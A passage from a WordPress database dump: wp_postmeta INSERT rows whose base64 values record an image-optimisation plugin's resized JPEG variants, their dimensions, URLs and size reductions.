pZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcwUy03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTQ3MFMtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjI3MzAsInRpbWUiOjE0ODM1NjQ5MTAsImlkIjoxNzU1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MFMtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcwUy0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDcwUy0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxMzMyNCwidGltZSI6MTQ4MzU2NDkxNCwiaWQiOjE3NTV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcwUy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MFMtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy00NzBTLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo2MTYsInRpbWUiOjE0ODM1NjQ5MTcsImlkIjoxNzU1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MFMtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzBTLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDcwUy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NTAwLCJ0aW1lIjoxNDgzNTY0OTIwLCJpZCI6MTc1NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzBTLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcwUy0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTQ3MFMtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjU2NywidGltZSI6MTQ4MzU2NDkyNCwiaWQiOjE3NTV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcwUy01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MFMtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy00NzBTLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxOTIyLCJ0aW1lIjoxNDgzNTY0OTI3LCJpZCI6MTc1NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MFMtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzBTLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDcwUy0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NDEwLCJ0aW1lIjoxNDgzNTY0OTMxLCJpZCI6MTc1NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MFMtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzBTLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDcwUy0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NTQ4LCJ0aW1lIjoxNDgzNTY0OTM0LCJpZCI6MTc1NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MFMtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzBTLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDcwUy0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NjQzLCJ0aW1lIjoxNDgzNTY0OTM3LCJpZCI6MTc1NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MFMtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzBTLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDcwUy00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6OTUwLCJ0aW1lIjoxNDgzNTY0OTQxLCJpZCI6MTc1NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MFMtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcwUy05MHg5MC5qcGciLCJ3aWR0aCI6IjkwIiwiaGVpZ2h0IjoiOTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDcwUy05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjM4MywidGltZSI6MTQ4MzU2NDk0NCwiaWQiOjE3NTV9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29246, 1754, 'wpfc_optimisation_reduction', '26611'); 
INSERT INTO `wp_postmeta` VALUES (29247, 1754, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcwQy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MEMuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU2NDk0OSwiaWQiOiIxNzU0In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzBDLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcwQy0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTQ3MEMtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjkzNSwidGltZSI6MTQ4MzU2NDk1MiwiaWQiOjE3NTR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcwQy04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MEMtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy00NzBDLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjozMTAzLCJ0aW1lIjoxNDgzNTY0OTU2LCJpZCI6MTc1NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzBDLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcwQy03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTQ3MEMtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjI3NDEsInRpbWUiOjE0ODM1NjQ5NTksImlkIjoxNzU0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MEMtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcwQy0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDcwQy0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxMzI5MywidGltZSI6MTQ4MzU2NDk2MywiaWQiOjE3NTR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcwQy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MEMtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy00NzBDLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo2MTYsInRpbWUiOjE0ODM1NjQ5NjYsImlkIjoxNzU0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MEMtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzBDLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDcwQy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NTEwLCJ0aW1lIjoxNDgzNTY0OTcwLCJpZCI6MTc1NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzBDLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcwQy0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTQ3MEMtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjU4NywidGltZSI6MTQ4MzU2NDk3MywiaWQiOjE3NTR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcwQy01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MEMtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy00NzBDLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxOTAwLCJ0aW1lIjoxNDgzNTY0OTc2LCJpZCI6MTc1NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MEMtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzBDLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDcwQy0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NDE3LCJ0aW1lIjoxNDgzNTY0OTgwLCJpZCI6MTc1NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MEMtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzBDLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDcwQy0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NTQ4LCJ0aW1lIjoxNDgzNTY0OTgzLCJpZCI6MTc1NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MEMtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzBDLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDcwQy0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NjMxLCJ0aW1lIjoxNDgzNTY0OTg2LCJpZCI6MTc1NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MEMtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NzBDLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDcwQy00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6OTU1LCJ0aW1lIjoxNDgzNTY0OTkwLCJpZCI6MTc1NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ3MEMtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDcwQy05MHg5MC5qcGciLCJ3aWR0aCI6IjkwIiwiaGVpZ2h0IjoiOTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNDcwQy05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjM3NSwidGltZSI6MTQ4MzU2NDk5MywiaWQiOjE3NTR9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29248, 1753, 'wpfc_optimisation_reduction', '21591'); 
INSERT INTO `wp_postmeta` VALUES (29249, 1753, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDY3Qy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2N0MuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU2NDk5OCwiaWQiOiIxNzUzIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NjdDLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDY3Qy0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTQ2N0MtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjc0NSwidGltZSI6MTQ4MzU2NTAwMSwiaWQiOjE3NTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDY3Qy04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2N0MtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy00NjdDLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoyNTc0LCJ0aW1lIjoxNDgzNTY1MDA1LCJpZCI6MTc1M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy00NjdDLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNDY3Qy03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTQ2N0MtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjIzMTYsInRpbWUiOjE0ODM1NjUwMDksImlkIjoxNzUzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTQ2N0MtMTYwMHgxMDY